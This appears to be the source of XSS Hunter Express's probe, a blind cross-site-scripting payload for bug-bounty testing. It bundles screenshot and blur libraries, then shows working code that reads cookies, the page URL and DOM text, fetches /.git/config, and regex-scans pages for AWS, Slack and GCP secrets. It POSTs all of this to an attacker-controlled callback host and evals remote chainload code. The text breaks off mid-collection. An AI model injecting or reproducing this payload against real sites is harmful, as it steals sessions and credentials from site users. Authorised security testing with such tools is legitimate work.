2021-05-31 19:06:40 +00:00
/ *
$$$$$$ \ $$ \ $$ \ $$$$$$$ \ $$$$$$ \ $$$$$$$ \ $$$$$$$$ \ $$$$$$ \ $$ \ $$ \ $$$$$$$$ \ $$ \
\ _$$ _ | $$$ \ $$$ | $$ _ _$$ \ $$ _ _$$ \ $$ _ _$$ \ \ _ _$$ _ _ | $$ _ _$$ \ $$$ \ $$ | \ _ _$$ _ _ | $$ |
$$ | $$$$ \ $$$$ | $$ | $$ | $$ / $$ | $$ | $$ | $$ | $$ / $$ | $$$$ \ $$ | $$ | $$ |
$$ | $$ \ $$ \ $$ $$ | $$$$$$$ | $$ | $$ | $$$$$$$ | $$ | $$$$$$$$ | $$ $$ \ $$ | $$ | $$ |
$$ | $$ \ $$$ $$ | $$ _ _ _ _ / $$ | $$ | $$ _ _$$ < $$ | $$ _ _$$ | $$ \ $$$$ | $$ | \ _ _ |
$$ | $$ | \ $ / $$ | $$ | $$ | $$ | $$ | $$ | $$ | $$ | $$ | $$ | \ $$$ | $$ |
$$$$$$ \ $$ | \ _ / $$ | $$ | $$$$$$ | $$ | $$ | $$ | $$ | $$ | $$ | \ $$ | $$ | $$ \
\ _ _ _ _ _ _ | \ _ _ | \ _ _ | \ _ _ | \ _ _ _ _ _ _ / \ _ _ | \ _ _ | \ _ _ | \ _ _ | \ _ _ | \ _ _ | \ _ _ | \ _ _ | \ _ _ |
$$$$$$$ \ $$ \ $$$$$$$ \ $$ \
$$ _ _$$ \ $$ | $$ _ _$$ \ $$ |
$$ | $$ | $$ | $$$$$$ \ $$$$$$ \ $$$$$$$ \ $$$$$$ \ $$ | $$ | $$$$$$ \ $$$$$$ \ $$$$$$$ |
$$$$$$$ | $$ | $$ _ _$$ \ \ _ _ _ _$$ \ $$ _ _ _ _ _ | $$ _ _$$ \ $$$$$$$ | $$ _ _$$ \ \ _ _ _ _$$ \ $$ _ _$$ |
$$ _ _ _ _ / $$ | $$$$$$$$ | $$$$$$$ | \ $$$$$$ \ $$$$$$$$ | $$ _ _$$ < $$$$$$$$ | $$$$$$$ | $$ / $$ |
$$ | $$ | $$ _ _ _ _ | $$ _ _$$ | \ _ _ _ _$$ \ $$ _ _ _ _ | $$ | $$ | $$ _ _ _ _ | $$ _ _$$ | $$ | $$ |
$$ | $$ | \ $$$$$$$ \ \ $$$$$$$ | $$$$$$$ | \ $$$$$$$ \ $$ | $$ | \ $$$$$$$ \ \ $$$$$$$ | \ $$$$$$$ |
\ _ _ | \ _ _ | \ _ _ _ _ _ _ _ | \ _ _ _ _ _ _ _ | \ _ _ _ _ _ _ _ / \ _ _ _ _ _ _ _ | \ _ _ | \ _ _ | \ _ _ _ _ _ _ _ | \ _ _ _ _ _ _ _ | \ _ _ _ _ _ _ _ |
This is a payload to test for Cross - site Scripting ( XSS ) . It is meant to be used by security professionals and bug bounty hunters .
This is a self - hosted instance of XSS Hunter Express . It is not the same as the XSS Hunter website .
* /
2023-01-14 01:26:10 +00:00
// Blur canvas https://github.com/flozz/StackBlur
! function ( t , e ) { "object" == typeof exports && "undefined" != typeof module ? e ( exports ) : "function" == typeof define && define . amd ? define ( [ "exports" ] , e ) : e ( ( t = "undefined" != typeof globalThis ? globalThis : t || self ) . StackBlur = { } ) } ( this , ( function ( t ) { "use strict" ; function e ( t ) { return ( e = "function" == typeof Symbol && "symbol" == typeof Symbol . iterator ? function ( t ) { return typeof t } : function ( t ) { return t && "function" == typeof Symbol && t . constructor === Symbol && t !== Symbol . prototype ? "symbol" : typeof t } ) ( t ) } var r = [ 512 , 512 , 456 , 512 , 328 , 456 , 335 , 512 , 405 , 328 , 271 , 456 , 388 , 335 , 292 , 512 , 454 , 405 , 364 , 328 , 298 , 271 , 496 , 456 , 420 , 388 , 360 , 335 , 312 , 292 , 273 , 512 , 482 , 454 , 428 , 405 , 383 , 364 , 345 , 328 , 312 , 298 , 284 , 271 , 259 , 496 , 475 , 456 , 437 , 420 , 404 , 388 , 374 , 360 , 347 , 335 , 323 , 312 , 302 , 292 , 282 , 273 , 265 , 512 , 497 , 482 , 468 , 454 , 441 , 428 , 417 , 405 , 394 , 383 , 373 , 364 , 354 , 345 , 337 , 328 , 320 , 312 , 305 , 298 , 291 , 284 , 278 , 271 , 265 , 259 , 507 , 496 , 485 , 475 , 465 , 456 , 446 , 437 , 428 , 420 , 412 , 404 , 396 , 388 , 381 , 374 , 367 , 360 , 354 , 347 , 341 , 335 , 329 , 323 , 318 , 312 , 307 , 302 , 297 , 292 , 287 , 282 , 278 , 273 , 269 , 265 , 261 , 512 , 505 , 497 , 489 , 482 , 475 , 468 , 461 , 454 , 447 , 441 , 435 , 428 , 422 , 417 , 411 , 405 , 399 , 394 , 389 , 383 , 378 , 373 , 368 , 364 , 359 , 354 , 350 , 345 , 341 , 337 , 332 , 328 , 324 , 320 , 316 , 312 , 309 , 305 , 301 , 298 , 294 , 291 , 287 , 284 , 281 , 278 , 274 , 271 , 268 , 265 , 262 , 259 , 257 , 507 , 501 , 496 , 491 , 485 , 480 , 475 , 470 , 465 , 460 , 456 , 451 , 446 , 442 , 437 , 433 , 428 , 424 , 420 , 416 , 412 , 408 , 404 , 400 , 396 , 392 , 388 , 385 , 381 , 377 , 374 , 370 , 367 , 363 , 360 , 357 , 354 , 350 , 347 , 344 , 341 , 338 , 335 , 332 , 329 , 326 , 323 , 320 , 318 , 315 , 312 , 310 , 307 , 304 , 302 , 299 , 297 , 294 , 292 , 289 , 287 , 285 , 282 , 280 , 278 , 275 , 273 , 271 , 269 , 267 , 265 , 263 , 261 , 259 ] , n = [ 9 , 11 , 12 , 13 , 13 , 14 , 14 , 15 , 15 , 15 , 15 , 16 , 16 , 16 , 16 , 17 , 17 , 17 , 17 , 17 , 17 , 17 , 18 , 18 , 18 , 18 , 18 , 18 , 18 , 18 , 18 , 19 , 19 , 19 , 19 , 19 , 19 , 19 , 19 , 19 , 19 , 19 , 19 , 19 , 19 , 20 , 20 , 20 , 20 , 20 , 20 , 20 , 20 , 20 , 20 , 20 , 20 , 20 , 20 , 20 , 20 , 20 , 20 , 21 , 21 , 21 , 21 , 21 , 21 , 21 , 21 , 21 , 21 , 21 , 21 , 21 , 21 , 21 , 21 , 21 , 21 , 21 , 21 , 21 , 21 , 21 , 21 , 21 , 21 , 21 , 22 , 22 , 22 , 22 , 22 , 22 , 22 , 22 , 22 , 22 , 22 , 22 , 22 , 22 , 22 , 22 , 22 , 22 , 22 , 22 , 22 , 22 , 22 , 22 , 22 , 22 , 22 , 22 , 22 , 22 , 22 , 22 , 22 , 22 , 22 , 22 , 22 , 23 , 23 , 23 , 23 , 23 , 23 , 23 , 23 , 23 , 23 , 23 , 23 , 23 , 23 , 23 , 23 , 23 , 23 , 23 , 23 , 23 , 23 , 23 , 23 , 23 , 23 , 23 , 23 , 23 , 23 , 23 , 23 , 23 , 23 , 23 , 23 , 23 , 23 , 23 , 23 , 23 , 23 , 23 , 23 , 23 , 23 , 23 , 23 , 23 , 23 , 23 , 23 , 23 , 23 , 24 , 24 , 24 , 24 , 24 , 24 , 24 , 24 , 24 , 24 , 24 , 24 , 24 , 24 , 24 , 24 , 24 , 24 , 24 , 24 , 24 , 24 , 24 , 24 , 24 , 24 , 24 , 24 , 24 , 24 , 24 , 24 , 24 , 24 , 24 , 24 , 24 , 24 , 24 , 24 , 24 , 24 , 24 , 24 , 24 , 24 , 24 , 24 , 24 , 24 , 24 , 24 , 24 , 24 , 24 , 24 , 24 , 24 , 24 , 24 , 24 , 24 , 24 , 24 , 24 , 24 , 24 , 24 , 24 , 24 , 24 , 24 , 24 , 24 ] ; function a ( t , r , n , a , o ) { if ( "string" == typeof t && ( t = document . getElementById ( t ) ) , ! t || "object" !== e ( t ) || ! ( "getContext" in t ) ) throw new TypeError ( "Expecting canvas with `getContext` method in processCanvasRGB(A) calls!" ) ; var i = t . getContext ( "2d" ) ; try { return i . getImageData ( r , n , a , o ) } catch ( t ) { throw new Error ( "unable to access image data: " + t ) } } function o ( t , e , r , n , o , f ) { if ( ! ( isNaN ( f ) || f < 1 ) ) { f |= 0 ; var g = a ( t , e , r , n , o ) ; g = i ( g , e , r , n , o , f ) , t . getContext ( "2d" ) . putImageData ( g , e , r ) } } function i ( t , e , a , o , i , f ) { for ( var g , l = t . data , c = 2 * f + 1 , s = o - 1 , v = i - 1 , b = f + 1 , x = b * ( b + 1 ) / 2 , d = new u , y = d , h = 1 ; h < c ; h ++ ) y = y . next = new u , h === b && ( g = y ) ; y . next = d ; for ( var p = null , m = null , w = 0 , B = 0 , C = r [ f ] , E = n [ f ] , I = 0 ; I < i ; I ++ ) { y = d ; for ( var S = l [ B ] , N = l [ B + 1 ] , R = l [ B + 2 ] , D = l [ B + 3 ] , G = 0 ; G < b ; G ++ ) y . r = S , y . g = N , y . b = R , y . a = D , y = y . next ; for ( var T = 0 , j = 0 , A = 0 , W = 0 , k = b * S , H = b * N , _ = b * R , M = b * D , O = x * S , P = x * N , q = x * R , z = x * D , F = 1 ; F < b ; F ++ ) { var J = B + ( ( s < F ? s : F ) << 2 ) , K = l [ J ] , L = l [ J + 1 ] , Q = l [ J + 2 ] , U = l [ J + 3 ] , V = b - F ; O += ( y . r = K ) * V , P += ( y . g = L ) * V , q += ( y . b = Q ) * V , z += ( y . a = U ) * V , T += K , j += L , A += Q , W += U , y = y . next } p = d , m = g ; for ( var X = 0 ; X < o ; X ++ ) { var Y = z * C >> E ; if ( l [ B + 3 ] = Y , 0 !== Y ) { var Z = 255 / Y ; l [ B ] = ( O * C >> E ) * Z , l [ B + 1 ] = ( P * C >> E ) * Z , l [ B + 2 ] = ( q * C >> E ) * Z } else l [ B ] = l [ B + 1 ] = l [ B + 2 ] = 0 ; O -= k , P -= H , q -= _ , z -= M , k -= p . r , H -= p . g , _ -= p . b , M -= p . a ; var $ = X + f + 1 ; $ = w + ( $ < s ? $ : s ) << 2 , O += T += p . r = l [ $ ] , P += j += p . g = l [ $ + 1 ] , q += A += p . b = l [ $ + 2 ] , z += W += p . a = l [ $ + 3 ] , p = p . next ; var tt = m , et = tt . r , rt = tt . g , nt = tt . b , at = tt . a ; k += et , H += rt , _ += nt , M += at , T -= et , j -= rt , A -= nt , W -= at , m = m . next , B += 4 } w += o } for ( var ot = 0 ; ot < o ; ot ++ ) { var it = l [ B = ot << 2 ] , ft = l [ B + 1 ] , gt = l [ B + 2 ] , ut = l [ B + 3 ] , lt = b * it , ct = b * ft , st = b * gt , vt = b * ut , bt = x * it , xt = x * ft , dt = x * gt , yt = x * ut ; y = d ; for ( var ht = 0 ; ht < b ; ht ++ ) y . r = it , y . g = ft , y . b = gt , y . a = ut , y = y . next ; for ( var pt = o , mt = 0 , wt = 0 , Bt = 0 , Ct = 0 , Et = 1 ; Et <= f ; Et ++ ) { B = pt + ot << 2 ; var It = b - Et ; bt += ( y . r = it = l [ B ] ) * It , xt += ( y . g = ft = l [ B + 1 ] ) * It , dt += ( y . b = gt = l [ B + 2 ] ) * It , yt += ( y . a = ut = l [ B + 3 ] ) * It , Ct += it , mt += ft , wt += gt , Bt += ut , y = y . next , Et < v && ( pt += o ) } B = ot , p = d , m = g ; for ( var St = 0 ;
//# sourceMappingURL=stackblur.min.js.map
2021-05-31 19:06:40 +00:00
// FormData polyfill https://github.com/jimmywarting/FormData
if ( "undefined" != typeof Blob && ( "undefined" == typeof FormData || ! FormData . prototype . keys ) ) { const e = "object" == typeof globalThis ? globalThis : "object" == typeof window ? window : "object" == typeof self ? self : this , t = e . FormData , n = e . XMLHttpRequest && e . XMLHttpRequest . prototype . send , o = e . Request && e . fetch , a = e . navigator && e . navigator . sendBeacon , s = e . Element && e . Element . prototype , r = e . Symbol && Symbol . toStringTag ; r && ( Blob . prototype [ r ] || ( Blob . prototype [ r ] = "Blob" ) , "File" in e && ! File . prototype [ r ] && ( File . prototype [ r ] = "File" ) ) ; try { new File ( [ ] , "" ) } catch ( t ) { e . File = function ( e , t , n ) { const o = new Blob ( e , n ) , a = n && void 0 !== n . lastModified ? new Date ( n . lastModified ) : new Date ; return Object . defineProperties ( o , { name : { value : t } , lastModifiedDate : { value : a } , lastModified : { value : + a } , toString : { value : ( ) => "[object File]" } } ) , r && Object . defineProperty ( o , r , { value : "File" } ) , o } } function normalizeValue ( [ e , t , n ] ) { return t instanceof Blob && ( t = new File ( [ t ] , n , { type : t . type , lastModified : t . lastModified } ) ) , [ e , t ] } function ensureArgs ( e , t ) { if ( e . length < t ) throw new TypeError ( ` ${ t } argument required, but only ${ e . length } present. ` ) } function normalizeArgs ( e , t , n ) { return t instanceof Blob ? [ String ( e ) , t , void 0 !== n ? n + "" : "string" == typeof t . name ? t . name : "blob" ] : [ String ( e ) , String ( t ) ] } function normalizeLinefeeds ( e ) { return e . replace ( /\r\n/g , "\n" ) . replace ( /\n/g , "\r\n" ) } function each ( e , t ) { for ( let n = 0 ; n < e . length ; n ++ ) t ( e [ n ] ) } class i { constructor ( e ) { this . _data = [ ] ; const t = this ; e && each ( e . elements , e => { if ( e . name && ! e . disabled && "submit" !== e . type && "button" !== e . type && ! e . matches ( "form fieldset[disabled] *" ) ) if ( "file" === e . type ) { each ( e . files && e . files . length ? e . files : [ new File ( [ ] , "" , { type : "application/octet-stream" } ) ] , n => { t . append ( e . name , n ) } ) } else if ( "select-multiple" === e . type || "select-one" === e . type ) each ( e . options , n => { ! n . disabled && n . selected && t . append ( e . name , n . value ) } ) ; else if ( "checkbox" === e . type || "radio" === e . type ) e . checked && t . append ( e . name , e . value ) ; else { const n = "textarea" === e . type ? normalizeLinefeeds ( e . value ) : e . value ; t . append ( e . name , n ) } } ) } append ( e , t , n ) { ensureArgs ( arguments , 2 ) , this . _data . push ( normalizeArgs ( e , t , n ) ) } delete ( e ) { ensureArgs ( arguments , 1 ) ; const t = [ ] ; e = String ( e ) , each ( this . _data , n => { n [ 0 ] !== e && t . push ( n ) } ) , this . _data = t } * entries ( ) { for ( var e = 0 ; e < this . _data . length ; e ++ ) yield normalizeValue ( this . _data [ e ] ) } forEach ( e , t ) { ensureArgs ( arguments , 1 ) ; for ( const [ n , o ] of this ) e . call ( t , o , n , this ) } get ( e ) { ensureArgs ( arguments , 1 ) ; const t = this . _data ; e = String ( e ) ; for ( let n = 0 ; n < t . length ; n ++ ) if ( t [ n ] [ 0 ] === e ) return normalizeValue ( t [ n ] ) [ 1 ] ; return null } getAll ( e ) { ensureArgs ( arguments , 1 ) ; const t = [ ] ; return e = String ( e ) , each ( this . _data , n => { n [ 0 ] === e && t . push ( normalizeValue ( n ) [ 1 ] ) } ) , t } has ( e ) { ensureArgs ( arguments , 1 ) , e = String ( e ) ; for ( let t = 0 ; t < this . _data . length ; t ++ ) if ( this . _data [ t ] [ 0 ] === e ) return ! 0 ; return ! 1 } * keys ( ) { for ( const [ e ] of this ) yield e } set ( e , t , n ) { ensureArgs ( arguments , 2 ) , e = String ( e ) ; const o = [ ] , a = normalizeArgs ( e , t , n ) ; let s = ! 0 ; each ( this . _data , t => { t [ 0 ] === e ? s && ( s = ! o . push ( a ) ) : o . push ( t ) } ) , s && o . push ( a ) , this . _data = o } * values ( ) { for ( const [ , e ] of this ) yield e } _asNative ( ) { const e = new t ; for ( const [ t , n ] of this ) e . append ( t , n ) ; return e } _blob ( ) { const e = "----formdata-polyfill-" + Math . random ( ) , t = [ ] ; for ( const [ n , o ] of this ) t . push ( ` -- ${ e } \r \n ` ) , o instanceof Blob ? t . push ( ` Content-Disposition: form-data; name=" ${ n } "; filename=" ${ o . name } " \r \n ` + ` Content-Type: ${ o . type || "application/octet-stream" } \r \n \r \n ` , o , "\r\n" ) : t . push ( ` Content-Disposition: form-data; name=" ${ n } " \r \n \r \n ${ o } \r \n ` ) ; return t . push ( ` -- ${ e } -- ` ) , new Blob ( t , { type : "multipart/form-data; boundary=" + e } ) } [ Symbol . iterator ] ( ) { return this . entries ( ) } toString ( ) { return "[object FormData]" } } if ( s && ! s . matches && ( s . matches = s . matchesSelector || s . mozMatchesSelector || s . msMatchesSelector || s . oMatchesSelector || s . webkitMatchesSelector || function ( e ) { for ( var t = ( this . document || this . ownerDocument ) . querySelectorAll ( e ) , n = t . length ; -- n >= 0 && t . item ( n ) !== this ; ) ; return n > - 1 } ) , r && ( i . prototype [ r ] = "FormData" ) , n ) { const t = e . XMLHttpRequest . prototype . setRequestHeader ; e . XMLHttpRequest . prototype . setRequestHeader = function ( e , n ) { t . call ( this , e , n ) , "content-type" === e . toLowerCase ( ) && ( this . _hasContentType = ! 0 ) } , e . XMLHttpRequest . prototype . send = function ( e ) { if ( e instanceof i ) { const t = e . _blob ( ) ; thi
// https://github.com/niklasvh/html2canvas
2023-01-14 01:47:27 +00:00
/ * !
* html2canvas 1.4 . 1 < https : //html2canvas.hertzen.com>
* Copyright ( c ) 2022 Niklas von Hertzen < https : //hertzen.com>
* Released under MIT License
* /
! function ( A , e ) { "object" == typeof exports && "undefined" != typeof module ? module . exports = e ( ) : "function" == typeof define && define . amd ? define ( e ) : ( A = "undefined" != typeof globalThis ? globalThis : A || self ) . html2canvas = e ( ) } ( this , function ( ) { "use strict" ;
/ * ! * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
Copyright ( c ) Microsoft Corporation .
Permission to use , copy , modify , and / or distribute this software for any
purpose with or without fee is hereby granted .
THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES WITH
REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY
AND FITNESS . IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY SPECIAL , DIRECT ,
INDIRECT , OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM
LOSS OF USE , DATA OR PROFITS , WHETHER IN AN ACTION OF CONTRACT , NEGLIGENCE OR
OTHER TORTIOUS ACTION , ARISING OUT OF OR IN CONNECTION WITH THE USE OR
PERFORMANCE OF THIS SOFTWARE .
2023-01-14 02:17:28 +00:00
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * /var r=function(A,e){return(r=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(A,e){A.__proto__=e}||function(A,e){for(var t in e)Object.prototype.hasOwnProperty.call(e,t)&&(A[t]=e[t])})(A,e)};function A(A,e){if("function"!=typeof e&&null!==e)throw new TypeError("Class extends value "+String(e)+" is not a constructor or null");function t(){this.constructor=A}r(A,e),A.prototype=null===e?Object.create(e):(t.prototype=e.prototype,new t)}var h=function(){return(h=Object.assign||function(A){for(var e,t=1,r=arguments.length;t<r;t++)for(var B in e=arguments[t])Object.prototype.hasOwnProperty.call(e,B)&&(A[B]=e[B]);return A}).apply(this,arguments)};function a(A,s,o,i){return new(o=o||Promise)(function(t,e){function r(A){try{n(i.next(A))}catch(A){e(A)}}function B(A){try{n(i.throw(A))}catch(A){e(A)}}function n(A){var e;A.done?t(A.value):((e=A.value)instanceof o?e:new o(function(A){A(e)})).then(r,B)}n((i=i.apply(A,s||[])).next())})}function H(t,r){var B,n,s,o={label:0,sent:function(){if(1&s[0])throw s[1];return s[1]},trys:[],ops:[]},A={next:e(0),throw:e(1),return:e(2)};return"function"==typeof Symbol&&(A[Symbol.iterator]=function(){return this}),A;function e(e){return function(A){return function(e){if(B)throw new TypeError("Generator is already executing.");for(;o;)try{if(B=1,n&&(s=2&e[0]?n.return:e[0]?n.throw||((s=n.return)&&s.call(n),0):n.next)&&!(s=s.call(n,e[1])).done)return s;switch(n=0,(e=s?[2&e[0],s.value]:e)[0]){case 0:case 1:s=e;break;case 4:return o.label++,{value:e[1],done:!1};case 5:o.label++,n=e[1],e=[0];continue;case 7:e=o.ops.pop(),o.trys.pop();continue;default:if(!(s=0<(s=o.trys).length&&s[s.length-1])&&(6===e[0]||2===e[0])){o=0;continue}if(3===e[0]&&(!s||e[1]>s[0]&&e[1]<s[3])){o.label=e[1];break}if(6===e[0]&&o.label<s[1]){o.label=s[1],s=e;break}if(s&&o.label<s[2]){o.label=s[2],o.ops.push(e);break}s[2]&&o.ops.pop(),o.trys.pop();continue}e=r.call(t,o)}catch(A){e=[6,A],n=0}finally{B=s=0}if(5&e[0])throw e[1];return{value:e[0]?e[1]:void 0,done:!0}}([e,A])}}}function t(A,e,t){if(t||2===arguments.length)for(var r,B=0,n=e.length;B<n;B++)!r&&B in e||((r=r||Array.prototype.slice.call(e,0,B))[B]=e[B]);return A.concat(r||e)}var d=(B.prototype.add=function(A,e,t,r){return new B(this.left+A,this.top+e,this.width+t,this.height+r)},B.fromClientRect=function(A,e){return new B(e.left+A.windowBounds.left,e.top+A.windowBounds.top,e.width,e.height)},B.fromDOMRectList=function(A,e){e=Array.from(e).find(function(A){return 0!==A.width});return e?new B(e.left+A.windowBounds.left,e.top+A.windowBounds.top,e.width,e.height):B.EMPTY},B.EMPTY=new B(0,0,0,0),B);function B(A,e,t,r){this.left=A,this.top=e,this.width=t,this.height=r}for(var f=function(A,e){return d.fromClientRect(A,e.getBoundingClientRect())},Q=function(A){for(var e=[],t=0,r=A.length;t<r;){var B,n=A.charCodeAt(t++);55296<=n&&n<=56319&&t<r?56320==(64512&(B=A.charCodeAt(t++)))?e.push(((1023&n)<<10)+(1023&B)+65536):(e.push(n),t--):e.push(n)}return e},g=function(){for(var A=[],e=0;e<arguments.length;e++)A[e]=arguments[e];if(String.fromCodePoint)return String.fromCodePoint.apply(String,A);var t=A.length;if(!t)return"";for(var r=[],B=-1,n="";++B<t;){var s=A[B];s<=65535?r.push(s):(s-=65536,r.push(55296+(s>>10),s%1024+56320)),(B+1===t||16384<r.length)&&(n+=String.fromCharCode.apply(String,r),r.length=0)}return n},e="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/ ",n=" undefined "==typeof Uint8Array?[]:new Uint8Array(256),s=0;s<e.length;s++)n[e.charCodeAt(s)]=s;for(var o=" ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789 + / " , c = " u n d e f i n e d " = = t y p e o f U i n t 8 A r r a y ? [ ] : n e w U i n t 8 A r r a y ( 2 5 6 ) , i = 0 ; i < o . l e n g t h ; i + + ) c [ o . c h a r C o d e A t ( i ) ] = i ; f u n c t i o n w ( A , e , t ) { r e t u r n A . s l i c e ? A . s l i c e ( e , t ) : n e w U i n t 1 6 A r r a y ( A r r a y . p r o t o t y p e . s l i c e . c a l l ( A , e , t ) ) } v a r U = ( l . p r o t o t y p e . g e t = f u n c t i o n ( A ) { v a r e ; i f ( 0 < = A ) { i f ( A < 5 5 2 9 6 | | 5 6 3 1 9 < A & & A < = 6 5 5 3 5 ) r e t u r n e = t h i s . i n d e x [ A > > 5 ] , t h i s . d a t a [ e = ( e < < 2 ) + ( 3 1 & A ) ] ; i f ( A < = 6 5 5 3 5 ) r e t u r n e = t h i s . i n d e x [ 2 0 4 8 + ( A - 5 5 2 9 6 > > 5 ) ] , t h i s . d a t a [ e = ( e < < 2 ) + ( 3 1 & A ) ] ; i f ( A < t h i s . h i g h S t a r t ) r e t u r n e = t h i s . i n d e x [ e = 2 0 8 0 +
2021-05-31 19:06:40 +00:00
var chainload _uri = [ CHAINLOAD _REPLACE _ME ] ;
var collect _page _list = [ COLLECT _PAGE _LIST _REPLACE _ME ]
// Source: https://stackoverflow.com/a/20151856/1195812
function base64 _to _blob ( base64Data , contentType ) {
contentType = contentType || '' ;
var sliceSize = 1024 ;
var byteCharacters = atob ( base64Data ) ;
var bytesLength = byteCharacters . length ;
var slicesCount = Math . ceil ( bytesLength / sliceSize ) ;
var byteArrays = new Array ( slicesCount ) ;
for ( var sliceIndex = 0 ; sliceIndex < slicesCount ; ++ sliceIndex ) {
var begin = sliceIndex * sliceSize ;
var end = Math . min ( begin + sliceSize , bytesLength ) ;
var bytes = new Array ( end - begin ) ;
for ( var offset = begin , i = 0 ; offset < end ; ++ i , ++ offset ) {
bytes [ i ] = byteCharacters [ offset ] . charCodeAt ( 0 ) ;
}
byteArrays [ sliceIndex ] = new Uint8Array ( bytes ) ;
}
return new Blob ( byteArrays , { type : contentType } ) ;
}
2023-01-26 17:53:54 +00:00
let check _cors = async function ( ) {
let res = await fetch ( "" , { method : 'HEAD' } )
for ( const header of res . headers ) {
if ( header [ 0 ] . toLowerCase ( ) == "access-control-allow-origin" ) {
return header [ 1 ] ;
}
}
return false
}
let check _git = async function ( ) {
let res = await fetch ( "/.git/config" ) ;
let text = await res . text ( ) ;
if ( text . startsWith ( "[core]" ) ) {
return text
}
return false
}
2021-05-31 19:06:40 +00:00
function get _guid ( ) {
var S4 = function ( ) {
return ( ( ( 1 + Math . random ( ) ) * 0x10000 ) | 0 ) . toString ( 16 ) . substring ( 1 ) ;
} ;
return ( S4 ( ) + S4 ( ) + "-" + S4 ( ) + "-" + S4 ( ) + "-" + S4 ( ) + "-" + S4 ( ) + S4 ( ) + S4 ( ) ) ;
}
function never _null ( value ) {
if ( value !== undefined ) {
return value ;
} else {
return '' ;
}
}
function collect _pages ( ) {
for ( var i = 0 ; i < collect _page _list . length ; i ++ ) {
// Make sure the path is correctly formatted
if ( collect _page _list [ i ] . charAt ( 0 ) != "/" ) {
collect _page _list [ i ] = "/" + collect _page _list [ i ] ;
}
collect _page _data ( collect _page _list [ i ] ) ;
}
}
function eval _remote _source ( uri ) {
var xhr = new XMLHttpRequest ( ) ;
xhr . onreadystatechange = function ( ) {
if ( xhr . readyState == XMLHttpRequest . DONE ) {
eval ( xhr . responseText ) ;
}
}
xhr . open ( 'GET' , uri , true ) ;
xhr . send ( null ) ;
}
function addEvent ( element , eventName , fn ) {
if ( element . addEventListener )
element . addEventListener ( eventName , fn , false ) ;
else if ( element . attachEvent )
element . attachEvent ( 'on' + eventName , fn ) ;
}
function get _dom _text ( ) {
var text _extractions _to _try = [
document . body . outerText ,
document . body . innerText ,
document . body . textContent ,
] ;
for ( var i = 0 ; i < text _extractions _to _try . length ; i ++ ) {
if ( typeof text _extractions _to _try [ i ] === 'string' ) {
return text _extractions _to _try [ i ] ;
}
}
return '' ;
}
function generate _random _string ( length ) {
var return _array = [ ] ;
var characters = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789' ;
var charactersLength = characters . length ;
for ( var i = 0 ; i < length ; i ++ ) {
return _array . push ( characters . charAt ( Math . floor ( Math . random ( ) * charactersLength ) ) ) ;
}
return return _array . join ( "" ) ;
}
function contact _mothership ( probe _return _data ) {
var form _data = new FormData ( ) ;
var payload _keys = Object . keys ( probe _return _data ) ;
payload _keys . map ( function ( payload _key ) {
if ( payload _key === 'screenshot' ) {
var base64 _data = probe _return _data [ payload _key ] . replace (
'data:image/png;base64,' ,
''
) ;
var screenshot _blob = base64 _to _blob (
base64 _data ,
'image/png'
) ;
form _data . append (
payload _key ,
screenshot _blob ,
"screenshot.png"
)
return
}
form _data . append ( payload _key , probe _return _data [ payload _key ] ) ;
} ) ;
var http = new XMLHttpRequest ( ) ;
var url = "[HOST_URL]/js_callback" ;
http . open ( "POST" , url , true ) ;
http . onreadystatechange = function ( ) {
if ( http . readyState == 4 && http . status == 200 ) {
}
}
2023-01-16 03:19:41 +00:00
form _data . append ( "path" , "[USER_PATH]" ) ;
2021-05-31 19:06:40 +00:00
http . send ( form _data ) ;
}
function send _collected _page ( page _data ) {
var form _data = new FormData ( ) ;
var payload _keys = Object . keys ( page _data ) ;
payload _keys . map ( function ( payload _key ) {
form _data . append ( payload _key , page _data [ payload _key ] ) ;
} ) ;
var http = new XMLHttpRequest ( ) ;
var url = "[HOST_URL]/page_callback" ;
http . open ( "POST" , url , true ) ;
http . onreadystatechange = function ( ) {
if ( http . readyState == 4 && http . status == 200 ) {
}
}
2023-01-16 03:32:50 +00:00
form _data . append ( "path" , "[USER_PATH]" ) ;
2021-05-31 19:06:40 +00:00
http . send ( form _data ) ;
}
2023-01-14 05:51:05 +00:00
function look _for _secrets ( data ) {
var findings = [ ] ;
let secret _regexes = {
2023-01-16 04:08:48 +00:00
"aws" : "((?:AKIA|ABIA|ACCA|ASIA)[0-9A-Z]{16})" ,
2023-01-14 05:51:05 +00:00
"slack" : "(https://hooks\.slack\.com/services/[A-Za-z0-9+/]{44,46})" ,
"GCP" : "\{[^{]+auth_provider_x509_cert_url[^}]+\}"
}
for ( let secret _type in secret _regexes ) {
let re = new RegExp ( secret _regexes [ secret _type ] )
let match = re . exec ( data ) ;
2023-01-16 03:59:18 +00:00
if ( Array . isArray ( match ) ) {
match = match . toString ( )
let finding = { } ;
finding = { "secret_type" : secret _type , "secret_value" : match } ;
findings . push ( finding ) ;
}
2023-01-14 05:51:05 +00:00
}
return findings
}
2021-05-31 19:06:40 +00:00
function collect _page _data ( path ) {
try {
var full _url = location . protocol + "//" + document . domain + path
var xhr = new XMLHttpRequest ( ) ;
xhr . onreadystatechange = function ( ) {
if ( xhr . readyState == XMLHttpRequest . DONE ) {
page _data = {
"html" : xhr . responseText ,
"uri" : full _url
}
send _collected _page ( page _data ) ;
}
}
xhr . open ( 'GET' , full _url , true ) ;
xhr . send ( null ) ;
} catch ( e ) {
}
}
probe _return _data = { } ;
// Prevent failure incase the browser refuses to give us any of the probe data.
try {
probe _return _data [ 'uri' ] = never _null ( location . toString ( ) ) ;
} catch ( e ) {
probe _return _data [ 'uri' ] = '' ;
}
try {
probe _return _data [ 'cookies' ] = never _null ( document . cookie ) ;
} catch ( e ) {
probe _return _data [ 'cookies' ] = '' ;
}
try {
